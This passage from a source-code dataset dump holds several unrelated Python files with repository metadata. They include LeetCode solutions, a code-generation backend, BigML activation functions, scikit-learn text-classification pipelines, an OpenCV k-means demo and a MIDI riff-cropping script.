# else:
# return sorted([sortedList[left][1] + 1, sortedList[right][1] + 1])
# left += 1
# right -= 1
hashVal = {}
length = len(numbers)
for i in range(length):
if target - numbers[i] in hashVal:
return [hashVal[target - numbers[i]], i + 1]
hashVal[numbers[i]] = i + 1
return [-1, -1] | [
"jke0zq@gmail.com"
] | jke0zq@gmail.com |
330d730d2bb745c574dbbb58a796b26d37a5afcb | 92e6f33a01b8f9e1e3b4914c67fbd6789a6abaac | /pygenic/backend/Backend.py | d9df99f5aaa80256e399441ad091bf558aad567c | [] | no_license | daeken/pygenic | 9a4b5b31eeca53b228999508d4f19bf56808cfaf | 8878a8bfdfb823a9143548a1de8e19c15c62523d | refs/heads/master | 2021-01-17T16:09:30.498552 | 2016-07-28T03:45:43 | 2016-07-28T03:45:43 | 61,535,924 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 767 | py | from pygenic import *
class Backend(object):
	"""Base class for pygenic code-generation backends (one per target
	language); subclasses are collected in the `backends` registry."""
	# Registry of backend subclasses, keyed by lowercased class name.
	backends = {}
	@staticmethod
	def register(cls):
		# Class decorator: register `cls` under its lowercased name.
		Backend.backends[cls.__name__.lower()] = cls
		return cls
	# Whitespace unit used for indentation in generated output.
	ws = '\t'
	def __init__(self, hexLiterals=True):
		# hexLiterals: presumably controls whether integer literals are
		# emitted in hex by subclasses — confirm against Value() overrides.
		self.temp_i = 0
		self.hexLiterals = hexLiterals
	def tempname(self, prefix='temp'):
		# Return a fresh unique identifier such as '__temp_1'.
		self.temp_i += 1
		return '__%s_%i' % (prefix, self.temp_i)
	def generate(self, node):
		# Dispatch on node kind: a pygenic Node starts a fresh generation
		# pass over its s-expression; a non-tuple is a literal value;
		# otherwise the tuple's head names the handler method to call.
		if isinstance(node, Node):
			self.output = ''
			self.indentation = 0
			self.generate(node.sexp(byName=True))
			return self.output
		elif not isinstance(node, tuple):
			return self.Value(node)
		return getattr(self, node[0])(*node[1:])
	def passthru(self, *args):
		# Generate each child and emit any text it returns. Value()/emit()
		# are expected to be provided by subclasses.
		for arg in args:
			ret = self.generate(arg)
			if ret is not None:
				self.emit(ret)
	Module = passthru
| [
"cody.brocious@gmail.com"
] | cody.brocious@gmail.com |
80a9a0385609f6092de63c881530a49feb80b62d | 09fd456a6552f42c124c148978289fae1af2d5c3 | /LinkedList/21.py | bbf74d969562ffdc2b3217be6edda17bdc828f3b | [] | no_license | hoang-ng/LeetCode | 60b4e68cbcf54cbe763d1f98a70f52e628ab32fb | 5407c6d858bfa43325363503c31134e560522be3 | refs/heads/master | 2021-04-10T11:34:35.310374 | 2020-07-28T10:22:05 | 2020-07-28T10:22:05 | 248,932,393 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,321 | py | # 21. Merge Two Sorted Lists
# Merge two sorted linked lists and return it as a new list. The new list should be made by splicing together the nodes of the first two lists.
# Example:
# Input: 1->2->4, 1->3->4
# Output: 1->1->2->3->4->4
# Definition for singly-linked list.
class ListNode(object):
    """A singly-linked list node holding one value."""
    def __init__(self, x):
        # x: the node's payload; `next` is linked up by callers.
        self.val = x
        self.next = None
class Solution(object):
    def mergeTwoLists(self, l1, l2):
        """Iteratively splice two sorted lists together (ties take l2)."""
        if l1 is None:
            return l2
        if l2 is None:
            return l1
        anchor = ListNode(0)
        tail = anchor
        while l1 is not None and l2 is not None:
            if l1.val < l2.val:
                tail.next = l1
                l1 = l1.next
            else:
                tail.next = l2
                l2 = l2.next
            tail = tail.next
        # Exactly one list is exhausted here; append the remainder.
        tail.next = l1 if l1 is not None else l2
        return anchor.next

    def mergeTwoLists2(self, l1, l2):
        """Recursive variant with identical ordering behavior."""
        if l1 is None or l2 is None:
            return l1 or l2
        if l1.val < l2.val:
            l1.next = self.mergeTwoLists2(l1.next, l2)
            return l1
        l2.next = self.mergeTwoLists2(l1, l2.next)
        return l2
"hoang2109@gmail.com"
] | hoang2109@gmail.com |
9e3718eabb1635e6485630419714c693a7599cdd | 705c2cf0ae1f38efb2340a056b0e78f89f83ec5e | /security_checks/mplcursors_interactive.py | a5758e070897d880410b40de7b7bbeebf9c67b42 | [] | no_license | Vital-Fernandez/vital_tests | 42fad619841d4b57c5ab419e6f58eef523ff8566 | ee8dbc9c09e433f91e78f9ea16977a9e5a44be6c | refs/heads/master | 2023-09-01T21:27:32.160440 | 2023-08-21T20:51:59 | 2023-08-21T20:51:59 | 235,336,802 | 0 | 1 | null | 2022-10-19T08:52:42 | 2020-01-21T12:24:57 | Python | UTF-8 | Python | false | false | 978 | py | # import numpy as np
# import matplotlib.pyplot as plt
# import mplcursors
#
# x = np.linspace(0, 10, 100)
#
# fig, ax = plt.subplots()
# ax.set_title("Click on a line to display its label")
#
# # Plot a series of lines with increasing slopes.
# for i in range(1, 20):
# ax.plot(x, i * x, label=f"$y = {i}x$")
#
# # Use a Cursor to interactively display the label for a selected line.
# mplcursors.cursor().connect(
# "add", lambda sel: sel.annotation.set_text(sel.artist.get_label()))
#
# plt.show()
import matplotlib.pyplot as plt
import numpy as np
import mplcursors
# Demo: clicking a plotted point shows its label via an mplcursors cursor.
# `data` is prepared for the commented-out multi-line example below but is
# unused by the active point-plot example.
data = np.outer(range(10), range(1, 5))
fig, ax = plt.subplots()
# lines = ax.plot(data)
# ax.set_title("Click somewhere on a line.\nRight-click to deselect.\n"
#              "Annotations can be dragged.")
lines = ax.plot(range(3), range(3), "o")
labels = ["a", "b", "c"]
cursor = mplcursors.cursor(lines)
# sel.index is the index of the picked point within the clicked artist.
cursor.connect("add", lambda sel: sel.annotation.set_text(labels[sel.index]))
plt.show()
"vital.fernandez@gmail.com"
] | vital.fernandez@gmail.com |
78970072af6b04d0d5817dcb82a22a137e0cf694 | 387400d70932b7b65f0ad0e24cb8290a8ce6ed46 | /August_18/129. Sum Root to Leaf Numbers.py | 01bbb2666f4a9e0dc162a013afb5256eadefec2e | [] | no_license | insigh/Leetcode | 0678fc3074b6294e8369756900fff32c7ce4e311 | 29113d64155b152017fa0a98e6038323d1e8b8eb | refs/heads/master | 2021-01-20T07:51:21.051366 | 2018-09-17T13:33:15 | 2018-09-17T13:33:15 | 90,051,425 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,269 | py | """
Given a binary tree containing digits from 0-9 only, each root-to-leaf path could represent a number.
An example is the root-to-leaf path 1->2->3 which represents the number 123.
Find the total sum of all root-to-leaf numbers.
Note: A leaf is a node with no children.
Example:
Input: [1,2,3]
1
/ \
2 3
Output: 25
Explanation:
The root-to-leaf path 1->2 represents the number 12.
The root-to-leaf path 1->3 represents the number 13.
Therefore, sum = 12 + 13 = 25.
"""
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
    def sumNumbers(self, root):
        """
        :type root: TreeNode
        :rtype: int

        Collect every root-to-leaf digit string via dfs, convert the
        strings to ints, and return their sum.
        """
        if not root:
            return 0
        self.res = []
        self.dfs(root, '')
        self.res = [int(num) for num in self.res]
        return sum(self.res)

    def dfs(self, node, temp):
        # Extend the running digit string; record it at a leaf, otherwise
        # recurse into whichever children exist.
        path = temp + str(node.val)
        if not node.left and not node.right:
            self.res.append(path)
        else:
            if node.left:
                self.dfs(node.left, path)
            if node.right:
                self.dfs(node.right, path)
| [
"zhangchaojie@ruc.edu.cn"
] | zhangchaojie@ruc.edu.cn |
29d251ed2774013737c30b03ac4211fbb47f0035 | 540789545998547d8f7d2732a8f2e9ffafcb4a93 | /bigml/laminar/math_ops.py | 0c39c5c0d9e95d5ba9041a77e1edcc9838515998 | [
"Apache-2.0"
] | permissive | davidifeoluwa/python | 801453adcc99a4eb0b92ef385ec20fa96f272f64 | b5dc03a4c695144250994261813bf39799a8c325 | refs/heads/master | 2020-03-11T04:01:21.906660 | 2018-04-03T16:26:49 | 2018-04-03T16:26:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,477 | py | # -*- coding: utf-8 -*-
#!/usr/bin/env python
#
# Copyright 2017-2018 BigML
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Activation functions and helpers in pure python
"""
import math
from bigml.laminar.constants import LARGE_EXP
def broadcast(fn):
    """Lift a vector function so it also maps over a list of vectors
    (matrix); empty input yields an empty list."""
    def apply(xs):
        if not xs:
            return []
        if isinstance(xs[0], list):
            return [fn(row) for row in xs]
        return fn(xs)
    return apply
def plus(mat, vec):
    """Add `vec` element-wise to each row of `mat`."""
    return [[cell + v for cell, v in zip(row, vec)] for row in mat]
def minus(mat, vec):
    """Subtract `vec` element-wise from each row of `mat`."""
    return [[cell - v for cell, v in zip(row, vec)] for row in mat]
def times(mat, vec):
    """Multiply each row of `mat` element-wise by `vec`."""
    return [[cell * v for cell, v in zip(row, vec)] for row in mat]
def divide(mat, vec):
    """Divide each row of `mat` element-wise by `vec`."""
    return [[cell / v for cell, v in zip(row, vec)] for row in mat]
def dot(mat1, mat2):
    """Return mat1 . mat2-transpose: entry (i, j) is the inner product of
    row i of mat1 with row j of mat2."""
    return [[sum(a * b for a, b in zip(row1, row2)) for row2 in mat2]
            for row1 in mat1]
def batch_norm(X, mean, stdev, shift, scale):
    """Batch-normalize rows of X: scale * (X - mean) / stdev + shift."""
    norm_vals = divide(minus(X, mean), stdev)
    return plus(times(norm_vals, scale), shift)
def sigmoid(xs):
    """Element-wise logistic sigmoid, guarded against overflow in exp()."""
    result = []
    for x in xs:
        if x > 0:
            if x < LARGE_EXP:
                ex_val = math.exp(x)
                result.append(ex_val / (ex_val + 1))
            else:
                # exp(x) would overflow; sigmoid saturates at 1.
                result.append(1)
        elif -x < LARGE_EXP:
            result.append(1 / (1 + math.exp(-x)))
        else:
            # exp(-x) would overflow; sigmoid saturates at 0.
            result.append(0)
    return result
def softplus(xs):
    """Element-wise log(1 + e^x); for very large x the identity is used
    since e^x would overflow and softplus(x) ~= x there."""
    return [x if x >= LARGE_EXP else math.log(math.exp(x) + 1) for x in xs]
def softmax(xs):
    """Numerically stable softmax: shift by the max before exponentiating."""
    peak = max(xs)
    scaled = [math.exp(x - peak) for x in xs]
    total = sum(scaled)
    return [s / total for s in scaled]
# Name -> activation function, each lifted by `broadcast` so it accepts
# either a single vector or a list of vectors (matrix).
ACTIVATORS = {
    'tanh': broadcast(lambda xs: [math.tanh(x) for x in xs]),
    'sigmoid': broadcast(sigmoid),
    'softplus': broadcast(softplus),
    'relu': broadcast(lambda xs: [x if x > 0 else 0 for x in xs]),
    'softmax': broadcast(softmax),
    'identity': broadcast(lambda xs: [float(x) for x in xs])
}
def init_layers(layers):
    """Shallow-copy each layer dict so callers can mutate them safely."""
    return list(map(dict, layers))
def destandardize(vec, v_mean, v_stdev):
    """Map standardized single-column rows back to the original scale."""
    restored = []
    for row in vec:
        restored.append([row[0] * v_stdev + v_mean])
    return restored
def to_width(mat, width):
    """Tile each row of `mat` and truncate so rows have exactly `width`
    entries (rows already wide enough are simply truncated)."""
    row_len = len(mat[0])
    if width > row_len:
        ntiles = int(math.ceil(width / float(row_len)))
    else:
        ntiles = 1
    return [(row * ntiles)[:width] for row in mat]
def add_residuals(residuals, identities):
    """Element-wise add the residual-connection inputs, tiled/truncated to
    the residual width via to_width."""
    tiled = to_width(identities, len(residuals[0]))
    assert len(tiled[0]) == len(residuals[0])
    return [[a + b for a, b in zip(res_row, id_row)]
            for res_row, id_row in zip(residuals, tiled)]
def propagate(x_in, layers):
    """Forward-propagate the batch `x_in` (list of rows) through `layers`.

    Each layer dict supplies 'weights' and 'offset', optional batch-norm
    statistics ('mean'/'stdev' with 'scale' used as gamma and 'offset' as
    beta), an 'activation_function' name, and a 'residuals' flag that adds
    the previous activation back in (width-adjusted via add_residuals).
    """
    last_X = identities = x_in
    for layer in layers:
        w = layer['weights']
        m = layer['mean']
        s = layer['stdev']
        b = layer['offset']
        g = layer['scale']
        afn = layer['activation_function']
        X_dot_w = dot(last_X, w)
        # Batch-norm when statistics are present, plain bias otherwise.
        if m is not None and s is not None:
            next_in = batch_norm(X_dot_w, m, s, b, g)
        else:
            next_in = plus(X_dot_w, b)
        if layer['residuals']:
            next_in = add_residuals(next_in, identities)
            last_X = ACTIVATORS[afn](next_in)
            # Residual layers also refresh the skip-connection source.
            identities = last_X
        else:
            last_X = ACTIVATORS[afn](next_in)
    return last_X
def sum_and_normalize(youts, is_regression):
    """Combine per-network output matrices: average the single column for
    regression, or sum element-wise and renormalize each row to a
    probability distribution for classification."""
    summed = []
    for i, row in enumerate(youts[0]):
        summed.append([sum(yout[i][j] for yout in youts)
                       for j in range(len(row))])
    if is_regression:
        return [[row[0] / len(youts)] for row in summed]
    normalized = []
    for row in summed:
        total = sum(row)
        normalized.append([y / total for y in row])
    return normalized
| [
"merce@bigml.com"
] | merce@bigml.com |
76d9ff4eb111325342e02d42d3862b6329453016 | 06919b9fd117fce042375fbd51d7de6bb9ae14fc | /py/tests/problems/linkedlist/loop_detect_test.py | 0120bef7fddaf215a3f2ca32b984123bbf69953c | [
"MIT"
] | permissive | bmoretz/Daily-Coding-Problem | 0caf2465579e81996869ee3d2c13c9ad5f87aa8f | f79e062e9f6e7b18b7e95c071fbe71ad104affcb | refs/heads/master | 2022-12-07T15:41:06.498049 | 2021-11-18T19:45:19 | 2021-11-18T19:45:19 | 226,376,236 | 1 | 0 | MIT | 2022-11-22T09:20:23 | 2019-12-06T17:17:00 | C++ | UTF-8 | Python | false | false | 1,243 | py | import unittest
from dcp.problems.linkedlist.node import build_ref_list
from dcp.problems.linkedlist.loop_detect import detect_loop1
class Test_DetectLoop1(unittest.TestCase):
    """Unit tests for detect_loop1 on circular singly-linked lists."""
    @staticmethod
    def set_loop(node, loop_back):
        # Make the list circular: point the tail's `next` at the node whose
        # data equals `loop_back`.
        loop_node, prev = None, None
        while node != None:
            if node.data == loop_back:
                loop_node = node
            prev = node
            node = node.next
        prev.next = loop_node
    def setUp(self):
        pass
    def test_case1(self):
        # No list at all -> no loop detected.
        assert detect_loop1(None) == None
    def test_case2(self):
        # Loop back to a middle node.
        node = build_ref_list(['A', 'B', 'C', 'D', 'E'])
        self.set_loop(node, 'C')
        actual = detect_loop1(node).data
        expected = 'C'
        assert actual == expected
    def test_case3(self):
        # Loop back to the head.
        node = build_ref_list(['A', 'B', 'C', 'D', 'E'])
        self.set_loop(node, 'A')
        actual = detect_loop1(node).data
        expected = 'A'
        assert actual == expected
    def test_case4(self):
        # Loop back to a node near the tail.
        node = build_ref_list(['A', 'B', 'C', 'D', 'E'])
        self.set_loop(node, 'D')
        actual = detect_loop1(node).data
        expected = 'D'
        assert actual == expected
"bmoretz@ionicsolutions.net"
] | bmoretz@ionicsolutions.net |
37803d71ba2811fec39a1deeee753f4bdc6deb73 | 4a869982cc4cc99d83df18465f545e51c97aeb37 | /.history/Baseline/ma-course-subjectivity-mining/pynlp/ml_pipeline/pipelines_20201015124127.py | 40b408e13f354ddad6524fd6ce7574e836258622 | [] | no_license | SorenKF/emotional_sm | 09d367421782d8c83987fb99be258b1b30c4ce8d | 63d51103f7511b19a83dec668327fcc7ea4a7f39 | refs/heads/main | 2023-02-03T14:12:14.572581 | 2023-01-24T18:06:52 | 2023-01-24T18:06:52 | 301,679,032 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,492 | py | from sklearn.pipeline import Pipeline, FeatureUnion
from ml_pipeline import preprocessing, representation
from sklearn.naive_bayes import MultinomialNB
from sklearn import svm
def pipeline(preprocessor, representation, classifier):
    """Chain preprocessing -> feature representation -> classifier into a
    single sklearn Pipeline with step names 'prep', 'frm' and 'clf'."""
    return Pipeline([('prep', preprocessor),
                     ('frm', representation),
                     ('clf', classifier)])
def combined_pipeline(prep1, repr1, prep2, repr2, classifier):
    """Build a Pipeline whose features are the union of two
    preprocess+represent branches (token features and polarity features),
    concatenated via FeatureUnion and fed to `classifier`."""
    combined_features = FeatureUnion([
        ('token_features', Pipeline([('prep1', prep1), ('repr1', repr1)])),
        ('polarity_features', Pipeline([('prep2', prep2), ('repr2', repr2)]))])
    return Pipeline([('features', combined_features),
                     ('clf', classifier)])
# ------------- parametrization ---------------------------
def svm_clf_grid_parameters():
    """Example parameters for an svm.LinearSVC grid search.

    The preprocessor and formatter can also be parametrized through the
    prefixes 'prep' and 'frm', respectively.
    """
    grid = {}
    grid['clf__class_weight'] = (None, 'balanced')
    grid['clf__dual'] = (True, False)
    grid['clf__C'] = (0.1, 1, 10)
    return grid
# ------------- standard pipelines ---------------------------------
def naive_bayes_counts():
    """Multinomial Naive Bayes over raw token counts."""
    return pipeline(preprocessing.std_prep(), representation.count_vectorizer({'min_df': 1}), MultinomialNB())
def naive_bayes_tfidf():
    """Multinomial Naive Bayes over tf-idf features."""
    return pipeline(preprocessing.std_prep(), representation.tfidf_vectorizer(), MultinomialNB())
def svm_libsvc_counts():
    """Linear SVM over raw token counts."""
    return pipeline(preprocessing.std_prep(), representation.count_vectorizer(), svm.LinearSVC(max_iter=10000,
                                                                               dual=False, C=0.1))
def svm_libsvc_tfidf():
    """Linear SVM over tf-idf features."""
    return pipeline(preprocessing.std_prep(), representation.tfidf_vectorizer(), svm.LinearSVC(max_iter=10000,
                                                                               dual=False, C=0.1))
def svm_libsvc_embed():
    """Linear SVM over pretrained wiki-news word embeddings."""
    return pipeline(preprocessing.std_prep(), representation.text2embeddings('wiki-news'), svm.LinearSVC(max_iter=10000,
                                                                               dual=False, C=0.1))
def svm_sigmoid_embed():
    """Sigmoid-kernel SVM over pretrained GloVe word embeddings."""
    return pipeline(preprocessing.std_prep(), representation.text2embeddings('glove'), svm.SVC(kernel='sigmoid',
                                                                               gamma='scale'))
# ---------------- emotional_sm pipelines -----------------------------
# ----- BASELINE ---------------
# SVM with character 4-grams
# Ver 1 - using chargrams inside word boundaries.
# def svm_libsvc_char_4gram():
# return pipeline(preprocessing.std_prep(), representation.count_vectorizer({'analyzer': 'char_wb', 'ngram_range':(4,4)}), svm.LinearSVC(max_iter=10000,
# dual=False, C=0.1))
# Ver 2 - using indescriminate char-4-grams.
def svm_libsvc_char_4gram():
    """Baseline: linear SVM over character 4-gram counts (plain 'char'
    analyzer, i.e. n-grams not restricted to word boundaries)."""
    return pipeline(preprocessing.std_prep(), representation.count_vectorizer({'analyzer': 'char', 'ngram_range': (4, 4)}), svm.LinearSVC(max_iter=10000,
                                                                               dual=False, C=0.1))
# --------------- DeepMoji embedding pipeline (work in progress) -------------
def deepmoji_embed():
    """Placeholder for a DeepMoji-embedding pipeline.

    NOTE(review): the original snapshot was syntactically invalid here (a
    bare `---------------` line and `def deepmoji_embed:` without
    parentheses). The syntax is fixed, but the call below is still
    incomplete: `pipeline` expects (preprocessor, representation,
    classifier) and `representation` here is the module itself, so a
    concrete representation and classifier must be supplied before use.
    """
    return pipeline(preprocessing.std_prep(), representation)
"s.k.f.fomsgaard@student.vu.nl"
] | s.k.f.fomsgaard@student.vu.nl |
24f069fc6d342348dc51bae9ba831ef54d23aa2d | 516d8b09391fcf6f1dd95fb665a617c4982af55d | /contact/migrations/0014_remove_contactuserpayam4_tarikhjavab.py | c50800d70842dbbe09b104e763f1bc2e8dfe3c43 | [] | no_license | rezmehp/abasian-peroject | 33eb357fbef3591b9cdd7d5a73fb2c90b62fb7a7 | 5c09a4d235719933f10688454066962dae13f3f5 | refs/heads/master | 2023-04-06T21:17:12.855048 | 2021-04-13T15:16:23 | 2021-04-13T15:16:23 | 235,763,509 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 344 | py | # Generated by Django 3.0.2 on 2020-03-30 15:45
from django.db import migrations
class Migration(migrations.Migration):
    """Drop the 'tarikhjavab' column from the contactuserpayam4 model.

    NOTE(review): 'tarikhjavab' is presumably a reply-date field —
    confirm against the model's migration history.
    """

    dependencies = [
        ('contact', '0013_auto_20200330_2013'),
    ]

    operations = [
        migrations.RemoveField(
            model_name='contactuserpayam4',
            name='tarikhjavab',
        ),
    ]
| [
"rezmehproject@gmail.com"
] | rezmehproject@gmail.com |
da1ab05092eedc735b9105d87a269a3ce7b359e0 | 6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4 | /rQkriLJBc9CbfRbJb_20.py | dda0425632ec74faa830b48d2c71f225b037b0bf | [] | no_license | daniel-reich/ubiquitous-fiesta | 26e80f0082f8589e51d359ce7953117a3da7d38c | 9af2700dbe59284f5697e612491499841a6c126f | refs/heads/master | 2023-04-05T06:40:37.328213 | 2021-04-06T20:17:44 | 2021-04-06T20:17:44 | 355,318,759 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 136 | py |
def index_of_caps(word):
    """Return the 0-based indices of all uppercase characters in *word*.

    Parameters
    ----------
    word : str
        String to scan; may be empty.

    Returns
    -------
    list[int]
        Positions whose character satisfies ``str.isupper``.
    """
    # Comprehension replaces the manual append loop; isupper() already
    # returns a bool, so the original `== True` comparison is redundant.
    return [i for i, ch in enumerate(word) if ch.isupper()]
| [
"daniel.reich@danielreichs-MacBook-Pro.local"
] | daniel.reich@danielreichs-MacBook-Pro.local |
7827d8a029673449b0405f45876d99fbc56ab1ee | 98c6ea9c884152e8340605a706efefbea6170be5 | /examples/data/Assignment_9/brdlia004/question2.py | f51e12c327875c64f8d15a6444ade3e2a4b02e7c | [] | no_license | MrHamdulay/csc3-capstone | 479d659e1dcd28040e83ebd9e3374d0ccc0c6817 | 6f0fa0fa1555ceb1b0fb33f25e9694e68b6a53d2 | refs/heads/master | 2021-03-12T21:55:57.781339 | 2014-09-22T02:22:22 | 2014-09-22T02:22:22 | 22,372,174 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 960 | py | """File reformatter"""
#Liam Brodie
#BRDLIA004
#11 May 2014
# --- Gather input: read the source file and flatten it into one string ---
print("Enter the input filename:")
infile = input("")
file = open(infile,"r")
string = file.readlines()
file.close()
print("Enter the output filename:")
outfile = input("")
# NOTE(review): eval() on raw user input is unsafe and unnecessary here —
# int(input(...)) is the safe equivalent for a numeric line width.
linelength = eval(input("Enter line width:\n"))
newS = ""
# Concatenate all lines, dropping each trailing newline.
# NOTE(review): no separator is inserted, so the last word of one line
# fuses with the first word of the next — confirm this is intended.
for line in string:
    if line[-1] == "\n":
        newS += line[:len(line)-1]
    else:
        newS += line
print(newS)
def newline(newS):
    """Recursively re-wrap *newS* into lines of at most `linelength` chars.

    Splits at the last space inside each `linelength`-wide window.
    Relies on the module-level global `linelength`.

    NOTE(review): the inner `if` has no matching `else`, so for the one
    input where the test is False the function falls through and
    implicitly returns None — confirm intended.
    """
    if(len(newS)==0):
        return ""
    else:
        # NOTE(review): newS[:2] is a *two*-character slice, so comparing it
        # to the one-character string '\n' is True for any text of length
        # >= 2 — verify whether a leading-newline check was actually meant.
        if(newS[:2]!='\n'):
            Space = newS[:linelength].rfind(" ")
            if(Space>0):
                #print(Space*" ")
                #print(newS[:Space+1])
                return newS[:Space] + "\n" + str(newline(newS[Space+1:]))
            else:
                # No space found inside the window: skip ahead two chars.
                return newline(newS[2:])
# --- Write the result ----------------------------------------------------
output = open(outfile,"w")
outtext = newline(newS)
# Bug fix: write the re-wrapped text (`outtext`); the original wrote the
# still-unwrapped `newS`, so the requested line width had no effect at all.
output.write(outtext)
output.close() | [
"jarr2000@gmail.com"
] | jarr2000@gmail.com |
4d6a87ecdb5ea24eb88b724c2eb6a34cebff36f0 | fe31c3cb21bac1cf7d06bb8dbb00ad7c09994403 | /afternoon_python/venv/Tuples_Lists_Dictionaries.py | 48f7408d63dc1905bd9303656c8225f857ddf067 | [] | no_license | bsakari/Python-Projects | 87718827daa9ff4ac16bf0855e04cadef329aa1d | 41104d8d1df84c27255f2d221ff68f219de8c84f | refs/heads/master | 2020-03-21T03:16:42.332439 | 2018-06-20T14:39:34 | 2018-06-20T14:39:34 | 138,045,571 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 513 | py | # () tuple Cannot be updated
# [] list Can be updated
# {} curly braces with bare values build a *set* — its elements cannot be
#    reassigned in place (NOTE(review): name3 below is a set, not a dict)
name1 = ("King","mimi","wewe",9,2.5,("two",7,2.5,"yes"))
# print(name1)
# print(name1[5])
# print(name1[0:4])
# print(name1[1:])
name2 = ["King","mimi","wewe",9,2.5,("two",7,2.5,"yes")]
print(name2)
# print(name2[5])
# print(name2[0:4])
# print(name2[1:])
# Lists are mutable: replace the first element in place.
name2[0] = "Mfalme"
print(name2)
# Sets are unordered and support no indexing/slicing (hence the commented-
# out print calls below would raise TypeError).
name3 = {"King","mimi","wewe",9,2.5,("two",7,2.5,"yes")}
print(name3)
# print(name3[5])
# print(name3[0:4])
# print(name3[1:])
| [
"sakaribenjamin@gmail.com"
] | sakaribenjamin@gmail.com |
5eff08a2a8ac3d7eb32d009fdf49681a45178538 | 6874be4a1382a7a79af829f733155cc1e33f2733 | /numstring.py | 9e352c04a1dca353cb2401c5450b88774f986d4b | [] | no_license | LawerenceLee/classes_PY | 9028604ef835aae8099658c7edfe6b509827e5ce | 440a0efff6ed4cb58a2d7b11e6cc86f49373b0af | refs/heads/master | 2021-07-10T06:34:13.537879 | 2017-10-10T22:09:24 | 2017-10-10T22:09:24 | 106,476,900 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 544 | py | class NumString:
    def __init__(self, value):
        # Store any value (int, float or str) canonically as a string.
        self.value = str(value)
    def __str__(self):
        """Return the raw stored string."""
        return self.value
    def __int__(self):
        """Interpret the stored string as an int (ValueError if not integral)."""
        return int(self.value)
    def __float__(self):
        """Interpret the stored string as a float."""
        return float(self.value)
    def __add__(self, other):
        # Add as a float when the stored text contains a decimal point,
        # otherwise add as an int.
        if '.' in self.value:
            return float(self) + other
        return int(self) + other
    def __radd__(self, other):
        # Addition is commutative here, so delegate to __add__.
        return self + other
def __iadd__(self, other):
self.valve = self + other
return self.value | [
"lucifitz.edward@gmail.com"
] | lucifitz.edward@gmail.com |
2775ffa54c0bc23d1d71871ec34631d79c86c5d8 | ee3039b27532d09c0c435ea7b92e29c70246c66e | /opencv/learnOpencv/091-120/110-KMeans进行数据分类.py | 29e53c58acf946e676b6778afd44438e05fed344 | [] | no_license | Alvazz/fanfuhan_ML_OpenCV | e8b37acc406462b9aaca9c5e6844d1db5aa3c944 | dacfdaf87356e857d3ff18c5e0a4fd5a50855324 | refs/heads/master | 2022-04-05T06:15:31.778227 | 2020-02-07T01:40:07 | 2020-02-07T01:40:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 814 | py | """
KMeans进行数据分类
"""
import cv2 as cv
import numpy as np
from matplotlib import pyplot as plt
# Two well-separated clusters of 25 random 2-D points each.
X = np.random.randint(25, 50, (25, 2))
Y = np.random.randint(60, 85, (25, 2))
pts = np.vstack((X, Y))
# Initialise the data (cv.kmeans requires float32 input)
data = np.float32(pts)
print(data.shape)
# Stopping criteria: epsilon of 1.0 or at most 10 iterations
criteria = (cv.TERM_CRITERIA_EPS + cv.TERM_CRITERIA_MAX_ITER, 10, 1.0)
# k-means with k=2 clusters and 2 attempts from random initial centres
ret, label, center = cv.kmeans(data, 2, None, criteria, 2, cv.KMEANS_RANDOM_CENTERS)
print(label.shape)
print(center)
# Split the points by their assigned cluster label
A = data[label.ravel() == 0]
B = data[label.ravel() == 1]
# plot the data
plt.scatter(A[:, 0], A[:, 1])
plt.scatter(B[:, 0], B[:, 1], c='r')
plt.scatter(center[:, 0], center[:, 1], s=80, c='y', marker='s')
plt.xlabel("x1")
plt.ylabel("x2")
plt.show()
cv.waitKey(0)
cv.destroyAllWindows() | [
"gitea@fake.local"
] | gitea@fake.local |
e0080d15f3124eb2541946e99066319f21c9cf29 | e20f478e1ea049e9539c4cbe5535338649651a28 | /music/process/crop.py | 4408f6423f9c18727674889669633690352de910 | [] | no_license | josephding23/RiffGAN | dde35d3f31f8e21d3a1a17ae958085dd8a752163 | f3850a22281fe8344d0db18919f3301d7bc9b55d | refs/heads/master | 2022-12-08T20:26:36.250666 | 2020-09-03T08:17:37 | 2020-09-03T08:17:37 | 269,524,888 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,303 | py | from dataset.grunge_library import *
from music.db_fragments.riff import *
import os
def crop_riffs():
    """Split every guitar and bass riff MIDI in the DB into per-measure files.

    For each riff document, crop its MIDI by measure, write the pieces to
    '<riff_path_without_.mid>/<measure>.mid', and register each piece
    (carrying over performer/album/song plus the measure's tonality) in the
    corresponding unit-riff table.
    """
    griff_table = get_guitar_riff_table()
    briff_table = get_bass_riff_table()
    unit_griff_table = get_unit_guitar_riff_table()
    unit_briff_table = get_unit_bass_riff_table()
    for griff in griff_table.find():
        measures_tonality = griff['MeasuresTonality']
        path = griff['Path']
        guitar_riff = GuitarRiff(path)
        cropped_riffs = guitar_riff.crop_by_measure()
        # path[:-4] strips the '.mid' suffix so the riff path doubles
        # as the output directory name.
        if not os.path.exists(path[:-4]):
            os.mkdir(path[:-4])
        for measure in range(guitar_riff.measures_num):
            cropped = cropped_riffs[measure]
            save_path = path[:-4] + '/' + str(measure) + '.mid'
            # NOTE(review): the write call rebuilds the same expression —
            # could simply be cropped.write(save_path).
            cropped.write(path[:-4] + '/' + str(measure) + '.mid')
            unit_griff_table.insert_one({
                'Performer': griff['Performer'],
                'Album': griff['Album'],
                'Song': griff['Song'],
                'Path': save_path,
                'Tonality': measures_tonality[measure]
            })
    # Identical procedure for the bass riffs.
    for briff in briff_table.find():
        measures_tonality = briff['MeasuresTonality']
        path = briff['Path']
